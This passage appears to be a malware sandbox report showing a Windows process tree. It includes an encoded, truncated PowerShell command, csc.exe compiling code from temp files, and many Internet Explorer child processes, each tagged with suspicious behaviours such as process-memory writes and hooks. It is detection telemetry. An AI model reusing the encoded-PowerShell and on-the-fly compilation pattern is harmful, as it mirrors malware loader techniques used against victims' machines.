C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yduppq40\yduppq40.cmdline"6⤵
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD4FC.tmp" "c:\Users\Admin\AppData\Local\Temp\yduppq40\CSC1C2BCD08D0674F4EBB14B4F82C2728A0.TMP"7⤵PID:4280
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gkonnpn0\gkonnpn0.cmdline"6⤵
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD692.tmp" "c:\Users\Admin\AppData\Local\Temp\gkonnpn0\CSCFBE45FDC2F347C08385E222A1869041.TMP"7⤵PID:3800
-
-
-
-
-
-
-
C:\Program Files (x86)\Internet Explorer\ielowutil.exe"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding1⤵PID:4436
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3632
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82950 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2752
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82954 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4492
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82958 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4992
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82962 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1928
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:17412 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2092
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82968 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2580
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82972 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2720
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82976 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4816
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82980 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4300
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82984 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 444 -ip 4441⤵PID:1512